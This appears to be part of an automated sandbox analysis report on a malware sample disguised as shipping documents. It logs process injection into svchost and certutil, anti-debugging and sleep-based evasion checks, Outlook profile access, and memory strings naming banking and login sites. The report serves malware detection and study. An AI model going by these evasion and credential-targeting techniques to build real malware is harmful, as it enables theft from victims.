            Source: C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\SysWOW64\certutil.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
            Source: C:\Windows\SysWOW64\certutil.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: Documente de expediere.exeStatic file information: File size 1168384 > 1048576
            Source: Documente de expediere.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: Documente de expediere.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: Documente de expediere.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: Documente de expediere.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Documente de expediere.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: Documente de expediere.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: Documente de expediere.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: QAWHbhvedb.exe, 0000000D.00000002.3704141726.0000000000B0E000.00000002.00000001.01000000.00000005.sdmp, QAWHbhvedb.exe, 0000000F.00000000.1609949459.0000000000B0E000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: Documente de expediere.exe, 00000000.00000003.1253941006.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, Documente de expediere.exe, 00000000.00000003.1256736614.0000000004030000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1430299412.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1428303783.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1543353346.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1543353346.000000000319E000.00000040.00001000.00020000.00000000.sdmp, certutil.exe, 0000000E.00000002.3714307025.00000000055E0000.00000040.00001000.00020000.00000000.sdmp, certutil.exe, 0000000E.00000002.3714307025.000000000577E000.00000040.00001000.00020000.00000000.sdmp, certutil.exe, 0000000E.00000003.1544921671.0000000005438000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000000E.00000003.1541505660.000000000528A000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: Documente de expediere.exe, 00000000.00000003.1253941006.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, Documente de expediere.exe, 00000000.00000003.1256736614.0000000004030000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.1430299412.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1428303783.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1543353346.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1543353346.000000000319E000.00000040.00001000.00020000.00000000.sdmp, certutil.exe, certutil.exe, 0000000E.00000002.3714307025.00000000055E0000.00000040.00001000.00020000.00000000.sdmp, certutil.exe, 0000000E.00000002.3714307025.000000000577E000.00000040.00001000.00020000.00000000.sdmp, certutil.exe, 0000000E.00000003.1544921671.0000000005438000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000000E.00000003.1541505660.000000000528A000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: certutil.pdb source: svchost.exe, 00000002.00000003.1503083628.0000000004E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1508047738.0000000005000000.00000004.00000020.00020000.00000000.sdmp, QAWHbhvedb.exe, 0000000D.00000003.1477789861.00000000031C8000.00000004.00000001.00020000.00000000.sdmp, QAWHbhvedb.exe, 0000000D.00000003.1479317286.0000000003315000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: certutil.exe, 0000000E.00000002.3705861434.0000000003601000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000000E.00000002.3715079219.0000000005C0C000.00000004.10000000.00040000.00000000.sdmp, QAWHbhvedb.exe, 0000000F.00000002.3714172615.0000000002B3C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1899080068.0000000001CDC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: certutil.exe, 0000000E.00000002.3705861434.0000000003601000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000000E.00000002.3715079219.0000000005C0C000.00000004.10000000.00040000.00000000.sdmp, QAWHbhvedb.exe, 0000000F.00000002.3714172615.0000000002B3C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1899080068.0000000001CDC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: certutil.pdbGCTL source: svchost.exe, 00000002.00000003.1503083628.0000000004E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1508047738.0000000005000000.00000004.00000020.00020000.00000000.sdmp, QAWHbhvedb.exe, 0000000D.00000003.1477789861.00000000031C8000.00000004.00000001.00020000.00000000.sdmp, QAWHbhvedb.exe, 0000000D.00000003.1479317286.0000000003315000.00000004.00000001.00020000.00000000.sdmp
            Source: Documente de expediere.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: Documente de expediere.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: Documente de expediere.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: Documente de expediere.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: Documente de expediere.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: C:\Users\user\Desktop\Documente de expediere.exeCode function: 0_2_0070C304 LoadLibraryA,GetProcAddress,0_2_0070C304
            Source: C:\Users\user\Desktop\Documente de expediere.exeCode function: 0_2_006B8B85 push ecx; ret 0_2_006B8B98
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00423063 push edi; retf 2_2_0042306C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00411827 push esp; ret 2_2_00411830
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004121D9 push ebx; iretd 2_2_0041220A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040D1DE push cs; iretd 2_2_0040D1DF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004121E3 push ebx; iretd 2_2_0041220A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004181EB push ss; ret 2_2_004181EC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004089AA push es; iretd 2_2_004089B2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004052ED push 00000019h; retf 2_2_004052EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041E3AD push A41E6336h; iretd 2_2_0041E3DC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040AC69 push es; iretd 2_2_0040AC6A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00403400 push eax; ret 2_2_00403402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00408511 push ebp; retf 2_2_0040851A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041A645 push ebx; iretd 2_2_0041A656
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0300225F pushad ; ret 2_2_030027F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030027FA pushad ; ret 2_2_030027F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030309AD push ecx; mov dword ptr [esp], ecx2_2_030309B6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0300283D push eax; iretd 2_2_03002858
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0300135E push eax; iretd 2_2_03001369
            Source: C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exeCode function: 13_2_03104390 push es; iretd 13_2_03104391
            Source: C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exeCode function: 13_2_030FEA14 push 00000019h; retf 13_2_030FEA16
            Source: C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exeCode function: 13_2_03117AD4 push A41E6336h; iretd 13_2_03117B03
            Source: C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exeCode function: 13_2_03111912 push ss; ret 13_2_03111913
            Source: C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exeCode function: 13_2_0310B900 push ebx; iretd 13_2_0310B931
            Source: C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exeCode function: 13_2_03106905 push cs; iretd 13_2_03106906
            Source: C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exeCode function: 13_2_0310E0AE pushfd ; ret 13_2_0310E0B1
            Source: C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exeCode function: 13_2_031020D1 push es; iretd 13_2_031020D9
            Source: C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exeCode function: 13_2_0310AF4E push esp; ret 13_2_0310AF57
            Source: C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exeCode function: 13_2_0311C78A push edi; retf 13_2_0311C793
            Source: C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exeCode function: 13_2_03113D6C push ebx; iretd 13_2_03113D7D
            Source: C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exeCode function: 13_2_03101C38 push ebp; retf 13_2_03101C41
            Source: C:\Users\user\Desktop\Documente de expediere.exeCode function: 0_2_00694A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00694A35
            Source: C:\Users\user\Desktop\Documente de expediere.exeCode function: 0_2_007155FD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_007155FD
            Source: C:\Users\user\Desktop\Documente de expediere.exeCode function: 0_2_006B33C7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_006B33C7
            Source: C:\Users\user\Desktop\Documente de expediere.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\certutil.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\certutil.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\certutil.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\certutil.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\certutil.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Switches to a custom stack to bypass stack traces
            Source: C:\Users\user\Desktop\Documente de expediere.exeAPI/Special instruction interceptor: Address: 1543294
            Source: C:\Windows\SysWOW64\certutil.exeAPI/Special instruction interceptor: Address: 7FFB2CECD324
            Source: C:\Windows\SysWOW64\certutil.exeAPI/Special instruction interceptor: Address: 7FFB2CECD7E4
            Source: C:\Windows\SysWOW64\certutil.exeAPI/Special instruction interceptor: Address: 7FFB2CECD944
            Source: C:\Windows\SysWOW64\certutil.exeAPI/Special instruction interceptor: Address: 7FFB2CECD504
            Source: C:\Windows\SysWOW64\certutil.exeAPI/Special instruction interceptor: Address: 7FFB2CECD544
            Source: C:\Windows\SysWOW64\certutil.exeAPI/Special instruction interceptor: Address: 7FFB2CECD1E4
            Source: C:\Windows\SysWOW64\certutil.exeAPI/Special instruction interceptor: Address: 7FFB2CED0154
            Source: C:\Windows\SysWOW64\certutil.exeAPI/Special instruction interceptor: Address: 7FFB2CECDA44
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0307096E rdtsc 2_2_0307096E
            Source: C:\Windows\SysWOW64\certutil.exeWindow / User API: threadDelayed 1425Jump to behavior
            Source: C:\Windows\SysWOW64\certutil.exeWindow / User API: threadDelayed 8549Jump to behavior
            Source: C:\Users\user\Desktop\Documente de expediere.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-99168
            Source: C:\Users\user\Desktop\Documente de expediere.exeAPI coverage: 4.6 %
            Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.6 %
            Source: C:\Windows\SysWOW64\certutil.exeAPI coverage: 2.6 %
            Source: C:\Windows\SysWOW64\certutil.exe TID: 7412Thread sleep count: 1425 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\certutil.exe TID: 7412Thread sleep time: -2850000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\certutil.exe TID: 7412Thread sleep count: 8549 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\certutil.exe TID: 7412Thread sleep time: -17098000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe TID: 7436Thread sleep time: -85000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe TID: 7436Thread sleep count: 34 > 30Jump to behavior
            Source: C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe TID: 7436Thread sleep time: -51000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe TID: 7436Thread sleep count: 38 > 30Jump to behavior
            Source: C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe TID: 7436Thread sleep time: -38000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\certutil.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\certutil.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\Documente de expediere.exeCode function: 0_2_006F4696 GetFileAttributesW,FindFirstFileW,FindClose,0_2_006F4696
            Source: C:\Users\user\Desktop\Documente de expediere.exeCode function: 0_2_006FC93C FindFirstFileW,FindClose,0_2_006FC93C
            Source: C:\Users\user\Desktop\Documente de expediere.exeCode function: 0_2_006FC9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_006FC9C7
            Source: C:\Users\user\Desktop\Documente de expediere.exeCode function: 0_2_006FF200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_006FF200
            Source: C:\Users\user\Desktop\Documente de expediere.exeCode function: 0_2_006FF35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_006FF35D
            Source: C:\Users\user\Desktop\Documente de expediere.exeCode function: 0_2_006FF65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_006FF65E
            Source: C:\Users\user\Desktop\Documente de expediere.exeCode function: 0_2_006F3A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_006F3A2B
            Source: C:\Users\user\Desktop\Documente de expediere.exeCode function: 0_2_006F3D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_006F3D4E
            Source: C:\Users\user\Desktop\Documente de expediere.exeCode function: 0_2_006FBF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_006FBF27
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_032BBE20 FindFirstFileW,FindNextFileW,FindClose,14_2_032BBE20
            Source: C:\Users\user\Desktop\Documente de expediere.exeCode function: 0_2_00694AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00694AFE
            Source: -Dbo613.14.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
            Source: -Dbo613.14.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
            Source: -Dbo613.14.drBinary or memory string: Canara Transaction PasswordVMware20,11696492231}
            Source: -Dbo613.14.drBinary or memory string: interactivebrokers.co.inVMware20,11696492231d
            Source: -Dbo613.14.drBinary or memory string: netportal.hdfcbank.comVMware20,11696492231
            Source: -Dbo613.14.drBinary or memory string: outlook.office.comVMware20,11696492231s
            Source: -Dbo613.14.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
            Source: -Dbo613.14.drBinary or memory string: AMC password management pageVMware20,11696492231
            Source: -Dbo613.14.drBinary or memory string: interactivebrokers.comVMware20,11696492231
            Source: -Dbo613.14.drBinary or memory string: microsoft.visualstudio.comVMware20,11696492231x
            Source: -Dbo613.14.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
            Source: -Dbo613.14.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
            Source: -Dbo613.14.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696492231
            Source: -Dbo613.14.drBinary or memory string: outlook.office365.comVMware20,11696492231t
            Source: -Dbo613.14.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
            Source: -Dbo613.14.drBinary or memory string: discord.comVMware20,11696492231f
            Source: certutil.exe, 0000000E.00000002.3705861434.0000000003601000.00000004.00000020.00020000.00000000.sdmp, QAWHbhvedb.exe, 0000000F.00000002.3712964134.0000000000BD0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: -Dbo613.14.drBinary or memory string: global block list test formVMware20,11696492231
            Source: -Dbo613.14.drBinary or memory string: dev.azure.comVMware20,11696492231j
            Source: -Dbo613.14.drBinary or memory string: www.interactivebrokers.comVMware20,11696492231}
            Source: -Dbo613.14.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
            Source: -Dbo613.14.drBinary or memory string: bankofamerica.comVMware20,11696492231x
            Source: -Dbo613.14.drBinary or memory string: trackpan.utiitsl.comVMware20,11696492231h
            Source: -Dbo613.14.drBinary or memory string: tasks.office.comVMware20,11696492231o
            Source: -Dbo613.14.drBinary or memory string: account.microsoft.com/profileVMware20,11696492231u
            Source: -Dbo613.14.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231
            Source: firefox.exe, 00000012.00000002.1901011524.0000022C81CDC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllAA7
            Source: -Dbo613.14.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
            Source: -Dbo613.14.drBinary or memory string: ms.portal.azure.comVMware20,11696492231
            Source: -Dbo613.14.drBinary or memory string: turbotax.intuit.comVMware20,11696492231t
            Source: -Dbo613.14.drBinary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
            Source: -Dbo613.14.drBinary or memory string: Canara Transaction PasswordVMware20,11696492231x
            Source: -Dbo613.14.drBinary or memory string: Interactive Brokers - HKVMware20,11696492231]
            Source: C:\Users\user\Desktop\Documente de expediere.exeAPI call chain: ExitProcess graph end nodegraph_0-97774
            Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\certutil.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0307096E rdtsc 2_2_0307096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00417843 LdrLoadDll,2_2_00417843
            Source: C:\Users\user\Desktop\Documente de expediere.exeCode function: 0_2_007041FD BlockInput,0_2_007041FD
            Source: C:\Users\user\Desktop\Documente de expediere.exeCode function: 0_2_00693B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00693B4C
            Source: C:\Users\user\Desktop\Documente de expediere.exeCode function: 0_2_006C5CCC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_006C5CCC
            Source: C:\Users\user\Desktop\Documente de expediere.exeCode function: 0_2_0070C304 LoadLibraryA,GetProcAddress,0_2_0070C304
            Source: C:\Users\user\Desktop\Documente de expediere.exeCode function: 0_2_01543560 mov eax, dword ptr fs:[00000030h]0_2_01543560
            Source: C:\Users\user\Desktop\Documente de expediere.exeCode function: 0_2_01543500 mov eax, dword ptr fs:[00000030h]0_2_01543500
            Source: C:\Users\user\Desktop\Documente de expediere.exeCode function: 0_2_01541E70 mov eax, dword ptr fs:[00000030h]0_2_01541E70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A30B mov eax, dword ptr fs:[00000030h]2_2_0306A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A30B mov eax, dword ptr fs:[00000030h]2_2_0306A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A30B mov eax, dword ptr fs:[00000030h]2_2_0306A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302C310 mov ecx, dword ptr fs:[00000030h]2_2_0302C310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03050310 mov ecx, dword ptr fs:[00000030h]2_2_03050310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03108324 mov eax, dword ptr fs:[00000030h]2_2_03108324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03108324 mov ecx, dword ptr fs:[00000030h]2_2_03108324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03108324 mov eax, dword ptr fs:[00000030h]2_2_03108324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03108324 mov eax, dword ptr fs:[00000030h]2_2_03108324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B035C mov eax, dword ptr fs:[00000030h]2_2_030B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B035C mov eax, dword ptr fs:[00000030h]2_2_030B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B035C mov eax, dword ptr fs:[00000030h]2_2_030B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B035C mov ecx, dword ptr fs:[00000030h]2_2_030B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B035C mov eax, dword ptr fs:[00000030h]2_2_030B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B035C mov eax, dword ptr fs:[00000030h]2_2_030B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FA352 mov eax, dword ptr fs:[00000030h]2_2_030FA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D8350 mov ecx, dword ptr fs:[00000030h]2_2_030D8350
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0310634F mov eax, dword ptr fs:[00000030h]2_2_0310634F
